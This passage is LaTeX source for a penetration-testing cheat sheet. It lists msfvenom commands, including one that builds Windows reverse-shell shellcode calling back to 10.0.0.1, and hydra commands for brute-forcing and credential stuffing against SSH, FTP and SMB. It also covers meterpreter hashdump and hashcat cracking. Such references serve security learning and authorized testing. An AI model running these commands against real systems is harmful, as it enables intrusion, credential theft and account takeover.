metasploit payloads via msfvenom} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -{}-list payloads`} \tn % Row Count 20 (+ 3) % Row 8 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To get the list of all options for a payload} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -p {\bf{payload\_name}} -{}-list-options`} \tn % Row Count 23 (+ 3) % Row 9 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{To get the list of payload file output formats supported by msfvenom} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -{}-list formats`} \tn % Row Count 26 (+ 3) % Row 10 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Basic syntax for using msfvenom} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -p {\bf{payload\_name}} {\bf{OPTION1=VALUE1}} {\bf{OPTION2=VALUE2}} -a {\bf{sys\_arch}} \{\{nl\}\}-f {\bf{out\_file\_format}} -o {\bf{out\_file\_name}}`} \tn % Row Count 31 (+ 5) \end{tabularx} \par\addvspace{1.3em} \vfill \columnbreak \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Metasploit (cont)}} \tn % Row 11 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Create reverse\_shell shellcode (e.g. 
for buffer overflow exploit)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}msfvenom -p \seqsplit{windows/shell\_reverse\_tcp} LHOST=10.0.0.1 LPORT=2222 \{\{nl\}\}EXITFUNC=thread -b "\textbackslash{}x00" -a x86 -f c`} \tn % Row Count 5 (+ 5) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Searchsploit / Exploit-db}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{To search for an exploit on exploit-db} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}Use `\{\{lang-plain\}\}exploit-db` website or `\{\{lang-plain\}\}searchsploit EXPLOIT\_NAME` on terminal} \tn % Row Count 4 (+ 4) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{After search, to get full local path on system for an exploit} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}searchsploit -p EXPLOITDB\_ID`} \tn % Row Count 7 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Reverse shell}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{https://www.revshells.com/}} \tn % Row Count 1 (+ 1) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{\seqsplit{https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology\%20and\%20Resources/Reverse\%20Shell\%20Cheatsheet.md}} \tn % Row Count 4 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Bruteforce}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Bruteforce password for a username to a service with 
hydra} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}hydra -l {\bf{username}} -P {\bf{/path/to/passwordlist}} {\bf{service}}://{\bf{ip\_addr}}:{\bf{port}}`\{\{nl\}\}`\{\{lang-plain\}\}hydra -l john -P \seqsplit{/usr/share/john/password.lst} ssh://10.0.0.1:22`} \tn % Row Count 6 (+ 6) % Row 1 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Trying every username/password combination with hydra (-L and -P take list files)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}hydra -L usernames.txt -P passwords.txt ftp://10.0.0.1:21`} \tn % Row Count 9 (+ 3) % Row 2 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{Credential stuffing with hydra using a file with colon-separated "uname:pass" pairs against multiple targets (-s sets the port; -p would be read as a password)} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}hydra -C logins.txt -M targets.txt -s 139 smb`} \tn % Row Count 14 (+ 5) % Row 3 \SetRowColor{white} \mymulticolumn{1}{x{5.377cm}}{Bruteforce the password of a zip file} \tn \mymulticolumn{1}{x{5.377cm}}{\hspace*{6 px}\rule{2px}{6px}\hspace*{6 px}`\{\{lang-plain\}\}fcrackzip -u -D -p {\bf{/path/to/wordlist}} {\bf{zipfile\_name}}`} \tn % Row Count 17 (+ 3) \hhline{>{\arrayrulecolor{DarkBackground}}-} \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{For bruteforcing web-sites/-apps, use Burp Suite \textgreater{}\textgreater{} Intruder \textgreater{}\textgreater{} Sniper (for password spraying, or to try several passwords against one username). 
Use Burp Suite \textgreater{}\textgreater{} Intruder \textgreater{}\textgreater{} Pitchfork (for credential stuffing with paired username/password lists) or Burp Suite \textgreater{}\textgreater{} Intruder \textgreater{}\textgreater{} Cluster bomb (to try every combination of username and password)} \tn \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{X} \SetRowColor{DarkBackground} \mymulticolumn{1}{x{5.377cm}}{\bf\textcolor{white}{Post Exploitation}} \tn % Row 0 \SetRowColor{LightBackground} \mymulticolumn{1}{x{5.377cm}}{} \tn % Row Count 0 (+ 0) \hhline{>{\arrayrulecolor{DarkBackground}}-} \end{tabularx} \par\addvspace{1.3em} \begin{tabularx}{5.377cm}{x{2.4885 cm} x{2.4885 cm} } \SetRowColor{DarkBackground} \mymulticolumn{2}{x{5.377cm}}{\bf\textcolor{white}{~}} \tn % Row 0 \SetRowColor{LightBackground} Dump password hashes of user accounts (from a meterpreter session) & `\{\{lang-plain\}\}hashdump` \tn % Row Count 2 (+ 2) % Row 1 \SetRowColor{white} To identify the type of a hash & `\{\{lang-plain\}\}hash-identifier` \tn % Row Count 4 (+ 2) % Row 2 \SetRowColor{LightBackground} To crack a hash using hashcat (check \seqsplit{https://hashcat.net/wiki/doku.php?id=hashcat} for the {\bf{hash-mode}}; -m 0 is MD5) & `\{\{lang-plain\}\}hashcat -m {\bf{hash-mode}} {\bf{digest}} {\bf{/path/to/wordlist}}\{\{nl\}\}hashcat -m 0 cd7350282... wordlist.txt` \tn % Row Count 10 (+ 6) \hhline{>{\arrayrulecolor{DarkBackground}}--} \end{tabularx} \par\addvspace{1.3em} % That's all folks \end{multicols*} \end{document}